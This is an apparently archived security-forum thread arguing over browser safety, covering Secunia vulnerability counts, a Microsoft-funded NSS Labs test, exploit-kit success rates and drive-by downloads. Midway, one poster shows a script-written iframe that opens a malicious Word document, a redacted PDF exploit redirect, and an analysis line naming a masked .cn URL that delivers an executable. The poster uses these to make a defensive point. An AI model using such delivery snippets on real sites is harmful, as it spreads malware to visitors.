Browser security report by Secunia

http://img115.imageshack.us/img115/1083/ffmostvulnerable.png

http://secunia.com/gfx/Secunia2008Report.pdf

 

Opera.

 

Lol, 1 vulnerability less isn't even worth talking about. Firefox is getting scary, IE is showing the old arguments against it are dead or dying.

 

In terms of number of security vulnerabilities, Firefox has been leading IE since 2006, I believe.

Firefox was supposed to be the "safer" browser that everyone installed back then to prevent them from being infected via IE. It's kind of sad to see how much one of the main pillars that Firefox built its reputation on has crumbled away, even more so when so many of their users are still relying on news from 2005 and believe what they're using is safer.

 

Is not only about the vulnerability founded but also the time taked to fixe them...

 

You sure are right about that However, quick fixes or not, Firefox is quickly flipping the "most secure browser" claim on its head, imho.

 

Its not just about number of vulnerability but about who patches fastest, Opera has had the least number of vulnerabilities and have been the fastest to patch. Thats to their credit. Just like Ubuntu, Opera may not be the fastest or latest but in overall sense, it is the most secure and if one has been following Secunia, it rarely has unpatched critical flaws. The moment thats discovered, Opera patches it and patches fast.

Mozilla foundation's claim was that their inherent design makes it secure over others, a claim that has now proved to be hollow in every sense.

 

Why hollow?

How many people using FF got infected through their browser? 0.
How many people keep getting infected using IE, no matter which version? > 0.

Mrk

 

The El Fiesta exploit kit logging 67 successes on Firefox 3.5: http://thompson.blog.avg.com/2009/0...stery-solved-well-partly-but-its-a-start.html

 

Arup,

You are a knowledgeable member. You have posted the thread https://www.wilderssecurity.com/showthread.php?t=236526&highlight=Arup in which the winning hacker in an interview said that Chrome was the hardest to hack (see https://www.wilderssecurity.com/showpost.php?p=1428411&postcount=9), also in another post a Standford University study is mentioned which states that Chrome will be less vlnarable to exploits (https://www.wilderssecurity.com/showpost.php?p=1341118&postcount=29).

Another member posted this test, but http://nsslabs.com/anti-malware/browser-security, but I found that it was funded by Micorsoft: http://www.thetechherald.com/articl...e-NSS-Labs-report-touting-the-benefits-of-IE8

It seems that 95% of the Wilders Members are in favour of FF, but you have to cripple it so much, it has just a little bit more functionality than a text based browser (I can't recall but according to Bellgamin the safest browser).

Kees1958 his opinion seems to be that Chrome (or Iron/Chromium) is the safest browser available at the moment. I noticed that he was told to POQ (which is an insult when I look it up at the Dictionary) when he hinted to a FF fan to switch to Chrome when using Sandboxie.

So here I am noting that a lot of undefended claims are stated at Wilders regarding the FF security, on the other hand I have a Hacker, Standford and a massive poster voting for Chrome and another very experienced security expert (Ilya of DefenseWall) and a experienced massive poster (you) voting for Opera.

You are one of the few brave members who dare to state that FF lags behind for over a few years. Now you are saying that Opera is the safest, could you explain that a little better (I think because exploits are fixed very quickly). I also found a post of the programmer of DefenseWall who thought that Opera was the safest browser at the time of posting. So I am not questioning your statement, just asking for explantion.

The previous post links to a blog which discusses an exploit. The exploit also summerises its succes against browsers (see pic), IE7 leads (nearly 5000 times succes, FF nearly 2000 succesfull exploited, Opera 200 times and Chrome 160). When you take the market share of IE into account http://en.wikipedia.org/wiki/Usage_share_of_web_browsers then the rating would be IE 75, FF 90, Chrome 122 and Opera 285) so that looks bad for FF, considering the fact that a study prooved that FF users are normally technical savvy and use a lot of security add ons.
Thanks EDIT mistake


EDIT: thanks for the PM, this clarifies a lot

 

No offense, but do you really believe that all it takes to dictate the outcome of a report is to fund it?

 

You have the numbers wrong btw. First column represents total hits, second column represent # of successful exploits.

Also, please do not take that report as representative of browser security.

 

No but you can influence it by agreeing on the study prerequisites, scope and hypothesis, before signing the funding. I am definitely not a Newby on that field of expertise.

 

Sorry, I have corrected this, you are right. No, there are to many aspects. That is what I am trying to understand, but the outcome now makes sense to me. Just found it nice that you also dared to question the general believe at Wilders that FF is the best and stated it with a sample.

Thanks

 

Don't worry, it just makes it all the easier for me if you already understand this.

Then that means the study is valid only within the specified scope of research, of course.

As stated, the NSS Labs study tests the ability of browsers to blacklist social engineering sites that deliver malware, and from what I can tell, it would seem that IE8 had the best ability to do so.

Whether this translates into IE8's security in general with all other factors was not tested, and cannot be determined via the methodologies and results of this study alone.

 

The outcome is more or less congruent with other indicative fact finding. As questioned by me in that thread, the difference between IE7 and IE8 are striking. So some of the new features of IE8 (smart screen and XSS filter) must have contributed to the succes. IT-wise Chrome and IE8 have chosen different roads to security improvement. Marketing wise they both have an advantage (XSS, smart screens URL analysis versus Sandbox) , it just comes in handy that the biggest got better no need to worry, so customers stay in your seats please, Even then, I think the majority of the customers won't take the trouble of installing a different browser for technical or security superiority, so discussion on this topic will be limited to 25 percent of the Windows based PC users maximum.

Thanks again

 

Come on !

You can't really believe that !

I presume you're not comparing FF on Linux vs. IE on Windows ? That's not a fair comparison.

'How many people using FF got infected through their browser? 0.'
There is no way you can back that up. Say, whay if a FF user is not using noscript plus that adblock thing, are they really safe from malicious scripts ?
Or what if they get (too many) dangerous add-ons for FF ?

IE 7 can be reasonably safe if you don't fall for the concept of 'trusted zones' (I've never needed them), increase the security settings, and use software (AV or otherwise) that monitors (attempted) changes to IE, and if you generally know what you are doing.

 

I'm talking Windows, FF vs IE.

Say, what if a FF user is not using noscript plus that adblock thing, are they really safe from malicious scripts?

The answer is: yes.

I'm waiting these last 3 years for one person to show me ONE example of a successful drive-by in Firefox (or Opera, for that matter).

So far, EVERY single, EVERY single explout ever shown and demonstrated was on IE. In FF, you may get a prompt to download file, at best. Now, downloading files and executing them ... that's a different story altogether.

But ONE example where you can actually do something malicious with FF. No one has shown me EVER.

IE CAN BE SAFE. That's not in dispute. But we're talking default levels.

Now, number of vulnerabilities means absolutely NOTHING. Why? Crude example: let's say a software X has 4 million local vulnerabilities, software Y has 1 remote. And which one do you think is more severe?

I don't care if FF has 300 or 7 trillion reported bugs found, it means nothing. As long as problems are solved quickly, everything is fine. Vulnerabilities that are patched are no longer vulnerabilities, are they?

Quick patch cycle, auto-update, you can't beat that.

Just a reference, do you know how many software and system bugs I reported in the last 6-7 months that you won't read about anywhere? The numbers mean nothing.

Once again, I IMPLORE, BEG and TEASE, one example of a drive-by in Firefox, I'll buy you icecream for a year. Hell, I'll buy an iPhone.

Besides, it's innocent until proven guilty. Crying that FF is bad is ok. But show me example.

Go to any HijackThis or spyware forum. Who do you think posts those logs and begs for help? FF users? Nope. IE users. With FF, you don't get drive-bys. What remains is pure deliberate user-initiated execution, but that equals suicide, for all that matters.

I'm not a fanboy or anything. I believe Opera is the same in this regard. And so is K-meleon and many other browsers. None supports local scripting or activex. That's all. The entire magic.

Mrk

 

This is certainly true for those that exploit a browser vulnerability.

However, the script can trigger other actions that enable the running of an executable, as has been demonstrated with PDF and DOC file explolits, where the user is redirected, or in using Google, gets to a malicious web site with this code:

Code:

<head>
<script>
document.write('<iframe src="somefile"></iframe')
</script>
</head>

where the document is loaded and opened.

Using Opera in your example with scripting enabled, I set up a simple test with that code in an HTML file, using a MSWord document which opens and runs a macro to load a DLL which starts an instance of IExplorer:

​

You can emphasize not to use MSWord or remove IExplorer, configure the browser to prompt for ALL files, keep scripting disabled, use another PDF Reader, etc. But nonetheless, using your scenario of scripting enabled, a user not taking those precautions can be victimized, so that some protection to block the payload would seem to be in order:

​

Real DOC and PDF exploits embed or call out for a malicious executable.

Many other ways exist to prevent executables from installing, of course, and I emphasize this because I don't think it's wise to consider the Browser impenetrable, because there are opportunites for exploitation if a user forgets to disable scripting, changes other settings, etc.

Advanced users, probably not. But who knows?

In this case, it is not an exploit of a Browser weakness, rather a script making use of a legitimate Browser function (i-frame in this case).

REFERENCE

Hosted javascript leading to .cn PDF malware
http://isc.sans.org/diary.html?storyid=6178


----
rich

 

Thanks for the example. I would appreciate the script code.

Still, please try this example:

Place the html file on a server and then open it in the browser. And then try to open a file that resides on the server - as is the case in drive-bys.

You will see that Opera / Firefox will prompt you for a download. You won't get the file opened, you'll get a prompt to open/save.

I just did that and here are the results:





Iframes, javascript and whatnot.

Cheers,
Mrk

 

OK, I'll run the test from a server.

I would bet that most users have their browser open documents directly.

This is the HTML code:

Code:

<head>
<script>
document.write('<iframe src="hmmapi.doc"></iframe')
</script>
</head>

Let's look at a current PDF exploit in the wild. I would venture to guess that most people use Acrobat Reader and make use of the Browser plugin.

Here is the exploit code (redacted):

Code:

SCRIPT language="javascript">
        
function PDF()
{
	for (var i=0;i<navigator.plugins.length;i++) 
	var name = navigator.plugins[i].name;
		if (name.indexOf("Adobe Acrobat") != -1) 
		{location.href = "spl/pdf.pdf"
}
PDF()
</script
 

wepawet analysis of the PDF code:

Code:

Shellcode and Malware:

....d.d...2.d..d
...2d.d.*..-....
..http://XXXXXX.cn/XXXXXXXXXXX/exe.php

...

MS-DOS executable PE for MS Windows (GUI) Intel 80386 32-bit)

 

This is a redirect from a legitimate site; the exploit runs upon connection to the malicious site:

Now, no one I've helped would be hit by either of these exploits because I configure Opera to prompt for all file types, so that even in a remote code execution (drive-by) exploit, you get a prompt:




Of course, we know that standard procedure should be to have the Browser Prompt to download files: But do you think all users are aware of this? You do, and you advocate using Foxit Reader, but how many "Mr.and Mrs. Smiths next door" do?

So that is my argument, that you cannot depend on the Browser to be impenetrable in the hands of everyone. There are just too many variables, too many settings, add-ons, ad nauseum.

And so, in answer to your challenge:

I give you two. Thanks for the offer of the rewards, but I'll decline since I prefer homemade ice cream, and have no use for an iPhone.


----
rich

 

Rmus, your example is valid provided the browser is set to open files automatically. But this is not the case, both for Firefox or Opera, by default.

By default, both these browsers prompt for download. So you have to go one step further and make files open automatically, which is no different than executing them yourself.





BTW, we agree on security. I don't count on the browser to do things. I count on this: double-click, it runs, no double-click, it does not run. As simple as that.

I'll send you some ice-cream via email ... I hope it doesn't melt on the way.

Cheers,
Mrk

 

That may be for the latest version of Opera. I'll check that. I installed the older v8.5 on my laptop and PDF is configured to use the Plugin:

At first the exploit would not work because I normally have Plugins disabled:
​

​

By the way - one other requirement was necessary for this particular PDF exploit to work: No outbound firewall monitoring. As the file opened, I got an alert:

​

I had to permit the connection for the download to attempt.

Yes, it is simple. But I never assume anything with people. I'll wager that many people think the browser is supposed to "do things" without any input. I know that this is true with those I've seen who use IE.

That's why it's necessary to get down in the trenches and help the clueless when we can and show them these things.

I've never had a problem making people understand basics. Using screenshots is a big help: a visual image registers in memory better than just a list of "thou shalt nots." This is especially effective with the WinAntiVirus exploits where a fake scan may pop up.

Thanks! Zip it using FreezerWrapZip.exe. I'll be waiting...


----
rich

 

A lot of tech talk ...

I'll ask it in a simple way: is it possible for FireFox (let's exclude zero-day vulnerabilities for the browser) in its default configuration, to encounter on a website malicious javascript that downloads a trojan ?

It's possible in IE. Would FF ask if you wanted to download or install the trojan ?

 

With outdated Java Runtime Env (JRE) installed, I've the impression that Smitfraud may silently install with IE/FF/Opera. Not too sure, but I think so.